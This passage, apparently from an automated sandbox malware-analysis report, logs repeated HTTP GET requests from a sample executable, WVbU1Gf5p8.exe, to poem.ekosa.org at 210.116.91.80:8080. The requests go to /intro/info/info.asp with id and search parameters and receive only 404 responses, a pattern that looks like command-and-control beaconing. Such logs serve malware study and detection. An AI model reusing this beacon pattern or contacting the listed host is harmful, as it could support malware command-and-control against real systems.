      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:35.225420952 CET545INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:34 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      66192.168.2.449834210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:35.605334044 CET545OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:35.869436979 CET546INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:35 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      67192.168.2.449835210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:36.134080887 CET547OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:36.395581007 CET547INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:35 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      68192.168.2.449836210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:36.665828943 CET548OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:36.928248882 CET548INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:36 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      69192.168.2.449837210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:37.310312033 CET549OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:37.573709965 CET550INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:36 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      7192.168.2.449766210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:00.678997040 CET124OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:00.949650049 CET130INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      70192.168.2.449838210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:37.850020885 CET550OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:38.122589111 CET551INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:37 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      71192.168.2.449839210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:38.393255949 CET551OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:38.658394098 CET552INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:37 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      72192.168.2.449840210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:39.049812078 CET553OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:39.309412956 CET553INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:39 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      73192.168.2.449841210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:39.579063892 CET554OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:39.839138985 CET555INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:39 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      74192.168.2.449842210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:40.108448029 CET556OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:40.369780064 CET566INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:40 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
